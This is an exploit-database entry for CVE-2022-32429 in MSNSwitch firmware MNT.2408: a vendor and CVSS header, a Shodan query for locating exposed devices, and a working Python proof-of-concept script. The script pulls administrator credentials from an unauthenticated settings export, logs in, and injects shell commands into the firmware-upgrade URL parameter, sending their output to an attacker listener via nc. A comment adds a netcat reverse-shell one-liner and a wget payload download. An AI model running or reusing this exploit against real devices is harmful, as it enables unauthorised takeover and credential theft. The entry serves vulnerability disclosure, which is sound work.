MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)

vendor:

MSNSwitch Firmware

by:

Eli Fulkerson

9.8

CVSS

CRITICAL

Remote Code Execution (RCE)

CWE

Product Name: MSNSwitch Firmware

Affected Version From: MNT.2408

Affected Version To: MNT.2408

Patch Exists: YES

Related CWE: CVE-2022-32429

CPE: a:msnswitch:msnswitch_firmware:mnt.2408

Metasploit:

Other Scripts:

Tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html, https://elifulkerson.com/CVE-2022-32429/, https://nvd.nist.gov/vuln/detail/CVE-2022-32429, http://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html

Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132', 'verified': True, 'vendor': 'megatech', 'product': 'msnswitch_firmware'}

Platforms Tested: MNT.2408 firmware

2022

MSNSwitch Firmware MNT.2408 – Remote Code Exectuion (RCE)

POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408. Configuration dump only requires HTTP access. Full RCE requires you to be on the same subnet as the device.

Mitigation:

Ensure that authentication is required for all administrative functions and that all users have unique, strong passwords.

Source

Exploit-DB raw data:

Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
Google Dork: n/a
Date:9/1/2022
Exploit Author: Eli Fulkerson
Vendor Homepage: https://www.msnswitch.com/
Version: MNT.2408
Tested on: MNT.2408 firmware
CVE: CVE-2022-32429

#!/usr/bin/python3


"""

POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.

Configuration dump only requires HTTP access.
Full RCE requires you to be on the same subnet as the device.

""" 

import requests
import sys
import urllib.parse
import readline
import random
import string


# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
LISTENER_HOST = "192.168.EDIT.ME"
LISTENER_PORT = 3434

# target msnswitch
TARGET="192.168.EDIT.ME2"
PORT=80

USERNAME = None
PASSWORD = None

"""
First vulnerability, unauthenticated configuration/credential dump
"""
if USERNAME == None or PASSWORD == None:
	# lets just ask
	hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"
	session = requests.session()

	data = session.get(hack_url)
	for each in data.text.split('\n'):
		key = None
		val = None

		try:
			key = each.strip().split('=')[0]
			val = each.strip().split('=')[1]
		except:
			pass

		if key == "Account1":
			USERNAME = val
		if key == "Password1":
			PASSWORD = val

"""
Second vulnerability, authenticated command execution

This only works on the local lan.

for full reverse shell, modify and upload netcat busybox shell script to /tmp:

	shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f
	download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp

ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
"""

session = requests.session()

# initial login, establishes our Cookie
burp0_url = f"http://{TARGET}:{PORT}/goform/login"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}
session.post(burp0_url, headers=burp0_headers, data=burp0_data)

# get our csrftoken
burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"
data = session.get(burp0_url)

csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]

while True:
	CMD = input('x:')
	CMD_u = urllib.parse.quote_plus(CMD)
	filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))

	try:
		hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"

		session.get(hack_url, timeout=0.01)
	except requests.exceptions.ReadTimeout:
		pass